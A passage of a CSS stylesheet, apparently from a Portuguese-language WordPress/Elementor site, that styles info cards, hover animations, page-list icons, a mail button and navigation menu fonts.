	background-color: #fff;
	box-shadow: 0 8px 7px #00000025;
	padding: 15px;
}

.custom-card-0 .infobox-icon {
	text-align: center;
    box-shadow: 0 0 7px #00000025;
	padding: 15px;
	height: 133px; /* REMOVER EM CASO DE EDIÇÃO */
}

.custom-card-0 .infobox-icon img {
	height: 148px;
}

.custom-card-0 .infobox-content h4.title {
	margin-top: 0 !important;
	padding-top: 35px; /* ALTERAR PARA 15 EM CASO DE EDIÇÃO */
}

/*--------------------------------------------------------------
## Setores > Técnicos
--------------------------------------------------------------*/
.cards-tecnicos .elementor-widget-container {
	transition: .5s all !important;	
}

.cards-tecnicos .elementor-widget-container:hover {
	transform: translateY(-10px);
}

.list-w100 a, .list-w100-2 a {
	width: 100%;
}

.list-w100-2 .ekit_page_list_content {
	justify-content: space-between;
	width: 100%;
}

.list-w100 .ekit_page_list_title_title::before {
	font-family: "Font Awesome 5 Free";
	font-weight: 900;
	position: absolute;
	right: 5px;
	bottom: 10px;
	content: "\f35d";
	opacity: 0;
	transition: .5s all;
	color: #5BA7EC50;
	transform: rotate(15deg);
}

.list-w100 a:hover .ekit_page_list_title_title::before {
	right: 15px;
	transform: rotate(0deg);
	opacity: 1;
}

.mail-btn-pos {
	position: absolute !important;
	bottom: 11px;
	left: -40%;
}

/* #menu-menu-principal {
	display: inline-flex !important;
    margin-left: auto !important;
}

@media (min-width: 992px) {
	#ekit-megamenu-menu-principal {
		display: flex !important;
	}
} */

.elementskit-navbar-nav-default .elementskit-navbar-nav>li>a {
	font-size: 14px !important;
}

@media (max-width: 768px) {
	.mail-btn-pos {
		left: 10px !important;
	}
}

.botao-texto {
	position: relative;
	left: 7px;
}